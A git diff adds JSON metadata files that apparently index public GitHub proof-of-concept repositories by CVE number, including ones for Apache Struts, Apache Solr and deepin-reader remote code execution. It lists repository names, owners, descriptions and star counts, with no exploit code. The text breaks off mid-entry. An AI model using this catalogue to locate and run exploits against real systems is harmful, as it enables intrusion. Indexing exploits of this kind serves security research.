"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zierax\/CVE-2023-50094_POC", + "description": "poc for CVE-2023-50094 (rengine command injection)", + "fork": false, + "created_at": "2024-11-23T20:00:29Z", + "updated_at": "2024-11-23T20:11:04Z", + "pushed_at": "2024-11-23T20:11:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50131.json b/2023/CVE-2023-50131.json new file mode 100644 index 0000000000..6a1b52c692 --- /dev/null +++ b/2023/CVE-2023-50131.json @@ -0,0 +1,33 @@ +[ + { + "id": 732301458, + "name": "CVE-2023-50131", + "full_name": "sajaljat\/CVE-2023-50131", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-50131", + "description": "XSS ", + "fork": false, + "created_at": "2023-12-16T08:08:11Z", + "updated_at": "2023-12-16T08:08:11Z", + "pushed_at": "2023-12-16T08:12:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50132.json b/2023/CVE-2023-50132.json new file mode 100644 index 0000000000..76286fb429 --- /dev/null +++ b/2023/CVE-2023-50132.json @@ -0,0 +1,33 @@ +[ + { + "id": 732302850, + "name": "CVE-2023-50132", + "full_name": "sajaljat\/CVE-2023-50132", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-50132", + "description": null, + "fork": false, + "created_at": "2023-12-16T08:14:14Z", + "updated_at": "2023-12-16T08:14:14Z", + "pushed_at": "2023-12-16T08:16:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50164.json b/2023/CVE-2023-50164.json new file mode 100644 index 0000000000..5b11f99483 --- /dev/null +++ b/2023/CVE-2023-50164.json @@ -0,0 +1,442 @@ +[ + { + "id": 581073273, + "name": "CVE-2023-50164", + "full_name": "minhbao15677\/CVE-2023-50164", + "owner": { + "login": "minhbao15677", + "id": 29054035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29054035?v=4", + "html_url": "https:\/\/github.com\/minhbao15677", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/minhbao15677\/CVE-2023-50164", + "description": null, + "fork": false, + "created_at": "2022-12-22T07:49:13Z", + "updated_at": "2024-04-26T02:52:45Z", + "pushed_at": "2024-04-26T02:52:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 731065261, + "name": "CVE-2023-50164-Apache-Struts-RCE", + "full_name": "jakabakos\/CVE-2023-50164-Apache-Struts-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-50164-Apache-Struts-RCE", + "description": "A critical security vulnerability, identified as CVE-2023-50164 (CVE: 9.8) was found in Apache Struts, allowing attackers to manipulate file upload parameters that can potentially lead to unauthorized path traversal and remote code execution (RCE).", + "fork": false, + "created_at": "2023-12-13T09:31:36Z", + "updated_at": "2024-11-27T21:19:08Z", + "pushed_at": "2024-08-30T06:37:53Z", + "stargazers_count": 81, + "watchers_count": 81, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 81, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 732181811, + "name": "CVE-2023-50164", + "full_name": "bcdannyboy\/CVE-2023-50164", + "owner": { + "login": "bcdannyboy", + "id": 12553297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12553297?v=4", + "html_url": "https:\/\/github.com\/bcdannyboy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bcdannyboy\/CVE-2023-50164", + "description": "A scanning utility and PoC for CVE-2023-50164", + "fork": false, + "created_at": "2023-12-15T21:19:51Z", + "updated_at": "2024-06-05T13:33:18Z", + "pushed_at": "2023-12-15T23:50:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 732688819, + "name": "cve-2023-50164-poc", + "full_name": "dwisiswant0\/cve-2023-50164-poc", + "owner": { + "login": "dwisiswant0", + "id": 25837540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4", + "html_url": "https:\/\/github.com\/dwisiswant0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dwisiswant0\/cve-2023-50164-poc", + "description": "Proof of Concept for Path Traversal in Apache Struts (\"CVE-2023-50164\")", + "fork": false, + "created_at": "2023-12-17T14:18:54Z", + "updated_at": "2024-11-16T19:50:08Z", + "pushed_at": "2023-12-18T02:46:21Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": true, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 59, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 732950140, + "name": "cve-2023-50164", + "full_name": "helsecert\/cve-2023-50164", + "owner": { + "login": "helsecert", + "id": 2202200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2202200?v=4", + "html_url": "https:\/\/github.com\/helsecert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/helsecert\/cve-2023-50164", + "description": null, + "fork": false, + "created_at": "2023-12-18T08:24:26Z", + "updated_at": "2024-01-13T09:38:24Z", + "pushed_at": "2023-12-18T13:29:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 733837034, + "name": "CVE-2023-50164-Apache-Struts-RCE", + "full_name": "Thirukrishnan\/CVE-2023-50164-Apache-Struts-RCE", + "owner": { + "login": "Thirukrishnan", + "id": 63901950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63901950?v=4", + "html_url": "https:\/\/github.com\/Thirukrishnan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Thirukrishnan\/CVE-2023-50164-Apache-Struts-RCE", + "description": null, + "fork": false, + "created_at": "2023-12-20T08:39:54Z", + "updated_at": "2024-01-23T11:26:28Z", + "pushed_at": "2023-12-20T09:51:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733839177, + "name": "CVE-2023-50164-ApacheStruts2-Docker", + "full_name": "Trackflaw\/CVE-2023-50164-ApacheStruts2-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-50164-ApacheStruts2-Docker", + "description": "Vulnerable docker container for Apache Struts 2 RCE CVE-2023-50164", + "fork": false, + "created_at": "2023-12-20T08:46:19Z", + "updated_at": "2024-05-14T07:52:52Z", + "pushed_at": "2023-12-20T12:57:28Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734560456, + "name": "cve-2023-50164", + "full_name": "miles3719\/cve-2023-50164", + "owner": { + "login": "miles3719", + "id": 104630628, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104630628?v=4", + "html_url": "https:\/\/github.com\/miles3719", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miles3719\/cve-2023-50164", + "description": null, + "fork": false, + "created_at": "2023-12-22T02:15:36Z", + "updated_at": "2023-12-22T02:15:36Z", + "pushed_at": "2023-12-22T02:15:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734561364, + "name": "cve-2023-50164", + "full_name": "aaronm-sysdig\/cve-2023-50164", + "owner": { + "login": "aaronm-sysdig", + "id": 132866139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132866139?v=4", + "html_url": "https:\/\/github.com\/aaronm-sysdig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaronm-sysdig\/cve-2023-50164", + "description": null, + "fork": false, + "created_at": "2023-12-22T02:20:11Z", + "updated_at": "2024-01-13T09:38:29Z", + "pushed_at": "2024-01-01T03:25:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737392401, + "name": "CVE-2023-50164-POC", + "full_name": "snyk-labs\/CVE-2023-50164-POC", + "owner": { + "login": "snyk-labs", + "id": 47793611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47793611?v=4", + "html_url": "https:\/\/github.com\/snyk-labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snyk-labs\/CVE-2023-50164-POC", + "description": null, + "fork": false, + "created_at": "2023-12-30T21:37:08Z", + "updated_at": "2024-11-28T12:21:03Z", + "pushed_at": "2024-01-16T14:59:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 742353008, + "name": "CVE-2023-50164-PoC", + "full_name": "sunnyvale-it\/CVE-2023-50164-PoC", + "owner": { + "login": "sunnyvale-it", + "id": 44291039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291039?v=4", + "html_url": "https:\/\/github.com\/sunnyvale-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunnyvale-it\/CVE-2023-50164-PoC", + "description": "CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept", + "fork": false, + "created_at": "2024-01-12T09:34:57Z", + "updated_at": "2024-01-25T20:19:52Z", + "pushed_at": "2024-01-16T13:05:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 787494467, + "name": "CVE-2023-50164Analysis-", + "full_name": "AsfandAliMemon25\/CVE-2023-50164Analysis-", + "owner": { + "login": "AsfandAliMemon25", + "id": 154571318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154571318?v=4", + "html_url": "https:\/\/github.com\/AsfandAliMemon25", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AsfandAliMemon25\/CVE-2023-50164Analysis-", + "description": "CVE-2023-50164 An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.", + "fork": false, + "created_at": "2024-04-16T16:20:04Z", + "updated_at": "2024-04-24T12:11:57Z", + "pushed_at": "2024-04-16T17:09:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "dockerfile", + "exploit", + "vulnerability", + "webapplications" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868505012, + "name": "CVE-2023-50164-PoC", + "full_name": "NikitaPark\/CVE-2023-50164-PoC", + "owner": { + "login": "NikitaPark", + "id": 25609921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25609921?v=4", + "html_url": "https:\/\/github.com\/NikitaPark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NikitaPark\/CVE-2023-50164-PoC", + "description": "CVE-2023-50164 PoC Application & Exploit script", + "fork": false, + "created_at": "2024-10-06T14:58:26Z", + "updated_at": "2024-10-09T11:25:35Z", + "pushed_at": "2024-10-09T11:18:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891621160, + "name": "CVE-2024-10924-Wordpress-Docker", + "full_name": "Trackflaw\/CVE-2024-10924-Wordpress-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2024-10924-Wordpress-Docker", + "description": "Vulnerable docker container for Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – Authentication Bypass CVE-2023-50164", + "fork": false, + "created_at": "2024-11-20T16:50:24Z", + "updated_at": "2024-11-25T19:41:23Z", + "pushed_at": "2024-11-22T09:28:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50226.json b/2023/CVE-2023-50226.json new file mode 100644 index 0000000000..4eb4026b8c --- /dev/null +++ b/2023/CVE-2023-50226.json @@ -0,0 +1,33 @@ +[ + { + "id": 711137981, + "name": "parallels-file-move-privesc", + "full_name": "kn32\/parallels-file-move-privesc", + "owner": { + "login": "kn32", + "id": 105210950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105210950?v=4", + "html_url": "https:\/\/github.com\/kn32", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kn32\/parallels-file-move-privesc", + "description": "Parallels Desktop privilege escalation - CVE-2023-50226 \/ ZDI-CAN-21227", + "fork": false, + "created_at": "2023-10-28T10:29:53Z", + "updated_at": "2024-01-30T20:34:52Z", + "pushed_at": "2023-12-31T08:48:26Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5024.json b/2023/CVE-2023-5024.json new file mode 100644 index 0000000000..987eb47478 --- /dev/null +++ b/2023/CVE-2023-5024.json @@ -0,0 +1,33 @@ +[ + { + "id": 697093590, + "name": "CVE-2023-5024", + "full_name": "PH03N1XSP\/CVE-2023-5024", + "owner": { + "login": "PH03N1XSP", + "id": 22360364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22360364?v=4", + "html_url": "https:\/\/github.com\/PH03N1XSP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PH03N1XSP\/CVE-2023-5024", + "description": null, + "fork": false, + "created_at": "2023-09-27T03:28:02Z", + "updated_at": "2023-09-27T03:28:03Z", + "pushed_at": "2023-09-27T03:46:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50245.json b/2023/CVE-2023-50245.json new file mode 100644 index 0000000000..44a6be71a1 --- /dev/null +++ b/2023/CVE-2023-50245.json @@ -0,0 +1,33 @@ +[ + { + "id": 845351915, + "name": "CVE-2023-50245", + "full_name": "200101WhoAmI\/CVE-2023-50245", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2023-50245", + "description": "exr viewer", + "fork": false, + "created_at": "2024-08-21T04:49:18Z", + "updated_at": "2024-08-21T04:49:40Z", + "pushed_at": "2024-08-21T04:49:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50254.json b/2023/CVE-2023-50254.json new file mode 100644 index 0000000000..f4327078db --- /dev/null +++ b/2023/CVE-2023-50254.json @@ -0,0 +1,33 @@ +[ + { + "id": 734620925, + "name": "deepin-linux_reader_RCE-exploit", + "full_name": "febinrev\/deepin-linux_reader_RCE-exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/deepin-linux_reader_RCE-exploit", + "description": "CVE-2023-50254: PoC Exploit for Deepin-reader RCE that affects unpatched Deepin Linux Desktops. Deepin Linux's default document reader \"deepin-reader\" software suffers from a serious vulnerability due to a design flaw that leads to Remote Command Execution via crafted docx document.", + "fork": false, + "created_at": "2023-12-22T06:50:28Z", + "updated_at": "2024-11-15T17:03:30Z", + "pushed_at": "2023-12-22T06:59:34Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50386.json b/2023/CVE-2023-50386.json new file mode 100644 index 0000000000..6e8ec56c40 --- /dev/null +++ b/2023/CVE-2023-50386.json @@ -0,0 +1,33 @@ +[ + { + "id": 765085923, + "name": "Apache-Solr-RCE_CVE-2023-50386_POC", + "full_name": "vvmdx\/Apache-Solr-RCE_CVE-2023-50386_POC", + "owner": { + "login": "vvmdx", + "id": 75788310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75788310?v=4", + "html_url": "https:\/\/github.com\/vvmdx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vvmdx\/Apache-Solr-RCE_CVE-2023-50386_POC", + "description": "Apache Solr Backup\/Restore APIs RCE Poc (CVE-2023-50386)", + "fork": false, + "created_at": "2024-02-29T08:57:47Z", + "updated_at": "2024-11-20T16:30:41Z", + "pushed_at": "2024-02-29T12:54:56Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 61, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50387.json b/2023/CVE-2023-50387.json new file mode 100644 index 0000000000..c85b1a3838 --- /dev/null +++ b/2023/CVE-2023-50387.json @@ -0,0 +1,64 @@ +[ + { + "id": 759552298, + "name": "CVE-2023-50387", + "full_name": "knqyf263\/CVE-2023-50387", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2023-50387", + "description": "KeyTrap (DNSSEC)", + "fork": false, + "created_at": "2024-02-18T21:50:04Z", + "updated_at": "2024-10-31T10:01:25Z", + "pushed_at": "2024-02-18T22:15:14Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 41, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 804928080, + "name": "SSR-DNSSEC", + "full_name": "Meirelez\/SSR-DNSSEC", + "owner": { + "login": "Meirelez", + "id": 131269269, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131269269?v=4", + "html_url": "https:\/\/github.com\/Meirelez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Meirelez\/SSR-DNSSEC", + "description": "In this repository you can find the files used to try to produce a POC for the CVE-2023-50387", + "fork": false, + "created_at": "2024-05-23T14:41:50Z", + "updated_at": "2024-05-23T19:29:12Z", + "pushed_at": "2024-05-23T19:29:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5043.json b/2023/CVE-2023-5043.json new file mode 100644 index 0000000000..49fc46233f --- /dev/null +++ b/2023/CVE-2023-5043.json @@ -0,0 +1,38 @@ +[ + { + "id": 743454639, + "name": "CVE-2023-5043", + "full_name": "r0binak\/CVE-2023-5043", + "owner": { + "login": "r0binak", + "id": 80983900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4", + "html_url": "https:\/\/github.com\/r0binak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0binak\/CVE-2023-5043", + "description": "PoC CVE-2023-5043", + "fork": false, + "created_at": "2024-01-15T09:20:35Z", + "updated_at": "2024-01-15T09:27:28Z", + "pushed_at": "2024-01-15T09:25:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "kubernetes", + "nginx", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5044.json b/2023/CVE-2023-5044.json new file mode 100644 index 0000000000..c74c160ba6 --- /dev/null +++ b/2023/CVE-2023-5044.json @@ -0,0 +1,99 @@ +[ + { + "id": 711804243, + "name": "CVE-2023-5044", + "full_name": "r0binak\/CVE-2023-5044", + "owner": { + "login": "r0binak", + "id": 80983900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4", + "html_url": "https:\/\/github.com\/r0binak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0binak\/CVE-2023-5044", + "description": "PoC CVE-2023-5044", + "fork": false, + "created_at": "2023-10-30T07:59:11Z", + "updated_at": "2024-01-15T02:36:46Z", + "pushed_at": "2023-12-30T18:10:00Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "kubernetes", + "nginx" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 744551896, + "name": "cve-2023-5044", + "full_name": "4ARMED\/cve-2023-5044", + "owner": { + "login": "4ARMED", + "id": 5612667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5612667?v=4", + "html_url": "https:\/\/github.com\/4ARMED", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4ARMED\/cve-2023-5044", + "description": null, + "fork": false, + "created_at": "2024-01-17T14:32:54Z", + "updated_at": "2024-01-31T02:18:13Z", + "pushed_at": "2024-01-29T21:36:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 779402262, + "name": "CVE-2023-5044", + "full_name": "KubernetesBachelor\/CVE-2023-5044", + "owner": { + "login": "KubernetesBachelor", + "id": 162622196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162622196?v=4", + "html_url": "https:\/\/github.com\/KubernetesBachelor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KubernetesBachelor\/CVE-2023-5044", + "description": "Poc for CVE 2023 5044", + "fork": false, + "created_at": "2024-03-29T18:53:50Z", + "updated_at": "2024-03-30T13:41:43Z", + "pushed_at": "2024-04-11T07:15:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50465.json b/2023/CVE-2023-50465.json new file mode 100644 index 0000000000..dbc828317e --- /dev/null +++ b/2023/CVE-2023-50465.json @@ -0,0 +1,33 @@ +[ + { + "id": 700635443, + "name": "CVE-2023-50465", + "full_name": "Ev3rR3d\/CVE-2023-50465", + "owner": { + "login": "Ev3rR3d", + "id": 108440914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108440914?v=4", + "html_url": "https:\/\/github.com\/Ev3rR3d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ev3rR3d\/CVE-2023-50465", + "description": null, + "fork": false, + "created_at": "2023-10-05T01:36:08Z", + "updated_at": "2024-01-20T04:15:54Z", + "pushed_at": "2023-10-05T01:41:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50564.json b/2023/CVE-2023-50564.json new file mode 100644 index 0000000000..2866aa2af0 --- /dev/null +++ b/2023/CVE-2023-50564.json @@ -0,0 +1,188 @@ +[ + { + "id": 831858004, + "name": "CVE-2023-50564_Pluck-v4.7.18_PoC", + "full_name": "Rai2en\/CVE-2023-50564_Pluck-v4.7.18_PoC", + "owner": { + "login": "Rai2en", + "id": 108242154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108242154?v=4", + "html_url": "https:\/\/github.com\/Rai2en", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rai2en\/CVE-2023-50564_Pluck-v4.7.18_PoC", + "description": "A Proof of Concept for CVE-2023-50564 vulnerability in Pluck CMS version 4.7.18", + "fork": false, + "created_at": "2024-07-21T20:15:10Z", + "updated_at": "2024-11-27T03:32:05Z", + "pushed_at": "2024-11-27T03:32:02Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 837227856, + "name": "CVE-2023-50564", + "full_name": "ipuig\/CVE-2023-50564", + "owner": { + "login": "ipuig", + "id": 109107529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109107529?v=4", + "html_url": "https:\/\/github.com\/ipuig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ipuig\/CVE-2023-50564", + "description": "CVE-2023-50564 PoC", + "fork": false, + "created_at": "2024-08-02T13:37:39Z", + "updated_at": "2024-08-02T14:03:32Z", + "pushed_at": "2024-08-02T14:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + 